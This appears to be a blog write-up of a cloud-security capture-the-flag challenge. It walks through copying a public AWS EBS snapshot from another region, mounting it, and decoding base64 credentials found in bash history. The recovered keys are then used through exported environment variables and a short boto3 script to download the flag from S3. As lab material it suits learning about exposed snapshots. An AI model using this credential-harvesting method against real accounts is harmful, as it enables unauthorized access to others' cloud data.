The SecOps Cheat Guide

SecurityLabs challenge: week two (public snapshot)

This one was a little more challenge than last weeks, but was still pretty simple.

"Our developer team made a snapshot called challenge-2 public. Seems like this was a bad mistake!

Can you get the flag to prove severity of this mistake?"

  1. First, we need to find the snapshot id. aws ec2 describe-snapshots gave us nothing with that name. Hrm. Maybe they made this a little interesting by staging this in another region? aws ec2 --region us-east-2 describe-snapshots gets us the snapshot ID!

  2. aws ec2 copy-snapshot --source-region us-east-2 --region us-east-1 --source-snapshot-id <id> (protip: you dont need the destination region if you can launch an instance in us-east-2...I cant.)

  3. Convert the snapshot into a volume. aws ec2 create-volume --availability-zone us-east-1a --snapshot-id <from above output>

  4. Launch a linux instance if you dont have one you can use as a workbench. Once active, attach the volume you just created to the instance. Note the device name you are given, mine was /dev/sda2

  5. On the workstation, verify the mount: lsblk. If this is successfully showing your volume, mount it! mount /dev/sda2 /mnt (use mnt, or whatever folder you want.)

  6. digging through the filesystem shows the ubuntu user. opening their BASH History reveals a base64 encoded command. Running this back through base64 -d gives you an AWS Access key id, Secret Key, and Session Token!

  7. Set up a profile with these new creds: aws configure. If you already have a profile, just set env variables instead:

export AWS_ACCESS_KEY_ID="key"
export AWS_SECRET_ACCESS_KEY="key"
export AWS_SESSION_TOKEN="token"

  1. Further inspection of the history shows a folder called "app". CD to that directory, and you will find a Python script called "app.py". This app did not work, threw an error about a function so inspect the script. You will get the bucket name and file name to download!

  2. Instead of fighting to fix the issue, I just created my own python script

import boto3
s3 = boto3.client('s3')
s3.download_file('BUCKET_NAME', 'KEY', 'FILE_NAME')

And viola! flag.txt downloaded!

Housekeeping:

  1. Remove the mount: umount /mnt
  2. Delete the snapshot and volume from your account. Also tear down the instance if you dont need it any longer,